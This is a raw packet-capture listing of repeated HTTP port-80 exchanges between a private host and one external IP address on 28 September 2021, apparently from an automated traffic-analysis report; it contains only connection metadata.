Sep 28, 2021 07:14:05.795512915 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795541048 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795557976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795581102 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795617104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795659065 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795660973 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795675993 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795713902 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796209097 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796230078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796245098 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796261072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796277046 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796287060 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796300888 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796303034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796319008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796333075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796336889 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796350002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796365023 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796366930 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796384096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796401024 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796406984 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796416044 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796432018 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796446085 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796447039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796462059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.796478033 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.796521902 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.830290079 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830358028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830374956 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830390930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830410004 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830435991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.830437899 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830455065 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830470085 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830487013 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.830516100 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.830620050 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830636978 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830650091 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830665112 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830682993 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.830698013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.830708027 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.831223965 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831248045 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831259012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831269979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831281900 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831329107 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.831376076 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.831753969 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831773996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831789017 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831800938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831820965 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831835032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831851959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831864119 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831864119 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.831876040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831904888 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831918955 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.831921101 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831937075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831959963 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.831979036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.831995964 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.832015991 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.832052946 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.832078934 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.832079887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.832096100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.832130909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.832133055 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.832148075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.832197905 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.833000898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833024979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833038092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833060980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833070993 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.833077908 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833091021 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833106041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833131075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833154917 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.833184958 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833199978 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833233118 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.833272934 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.833297968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.833359957 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.867460966 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.867482901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.867536068 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870502949 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870547056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870570898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870609045 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870613098 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870632887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870654106 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870660067 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870687008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870699883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870707035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870735884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870747089 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870771885 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870795012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870820045 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870832920 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870852947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870873928 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870876074 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870894909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870919943 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870925903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870946884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870966911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.870970964 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.870989084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871015072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871015072 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871037960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871057987 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871062040 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871078968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871098995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871099949 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871138096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871155977 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871160030 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871180058 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871201038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871202946 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871226072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871248007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871268034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871275902 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871289968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871301889 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871311903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871331930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871336937 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.871352911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.871377945 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.872505903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872576952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872603893 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.872621059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872663021 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872668028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.872692108 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872710943 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872730017 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.872775078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872814894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872818947 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.872925043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872945070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.872967958 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.872978926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.873020887 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.903800011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.903841972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.903904915 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.910334110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910367012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910408974 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910427094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910548925 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.910573006 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.910583973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910602093 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910615921 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910626888 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910643101 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910659075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.910675049 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.910690069 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.910701036 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.911137104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911185026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911241055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911252975 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.911262035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911293030 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911303043 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.911315918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911351919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911356926 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.911375046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.911416054 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912682056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912702084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912718058 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912733078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912748098 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912753105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912765026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912777901 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912786961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912801981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912816048 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912817001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912832022 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912837029 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912863016 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912878036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912882090 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912894011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912909031 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912909985 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912925005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.912950993 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.912970066 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913213015 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913248062 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913259029 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913283110 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913736105 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913770914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913785934 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913788080 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913829088 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913867950 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913912058 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913917065 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913949013 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913959980 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.913966894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.913995028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914009094 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914076090 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914099932 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914119959 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914136887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914150953 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914164066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914175987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914206028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914211988 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914222002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914237976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914247990 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914252996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914271116 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914273977 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914287090 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914290905 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914305925 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914314032 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914323092 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914336920 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914350986 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914352894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914357901 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914367914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914383888 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914395094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914403915 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914423943 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914437056 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914441109 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914454937 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914469957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914469957 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914489985 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914556026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.914581060 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.914592028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.940350056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.940377951 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.940388918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.940402031 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.940512896 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.948757887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948784113 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948796034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948807955 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948821068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948832035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948847055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948888063 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.948921919 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.948931932 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948949099 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948961973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.948985100 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949017048 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949043036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949085951 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949100971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949143887 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949229002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949273109 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949302912 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949318886 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949333906 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949345112 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949348927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949357986 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949384928 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949388027 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949402094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949413061 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949421883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949424982 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949453115 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949471951 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.949486971 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.949525118 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.950001001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.950057983 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.950089931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.950109005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.950130939 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.950145006 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.950165987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.950170994 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.950184107 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.950196981 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.950212002 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.950213909 CEST	80	49751	185.138.164.150	192.168.2.4
